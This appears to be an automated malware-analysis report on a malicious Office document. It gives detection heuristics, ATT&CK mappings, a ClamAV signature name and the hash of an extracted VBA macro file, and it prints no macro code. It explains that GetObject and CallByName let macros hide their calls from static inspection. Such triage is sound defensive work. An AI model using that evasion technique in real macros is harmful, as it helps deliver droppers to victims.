Verdict: MALICIOUS
Risk Score: 162

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by multiple high-severity heuristics and a ClamAV detection. The VBA code uses `GetObject` and `CallByName`, which resolve COM objects and invoke methods by name at run time, so the actual calls are hidden from static string inspection and suggest dynamic code execution. While the exact payload is obfuscated, the presence of these macros strongly implies downloader or dropper functionality, most likely intended to deliver a second-stage payload. The extracted `macros.bas` file is the source of these macros.
Heuristics (5)

- ClamAV: Doc.Malware.Valyria-9761059-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body); this is an OOXML schema namespace identifier, not an address the macro contacts
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28848 bytes |

SHA-256 (macros.bas): f2f750dd4ba27aa69a61c1a79afd0fe4033550eb29befb4f58018a7d40cc4a48
Preview script: first 1,000 lines of the extracted script (obfuscated VBA; the dump is truncated in this report).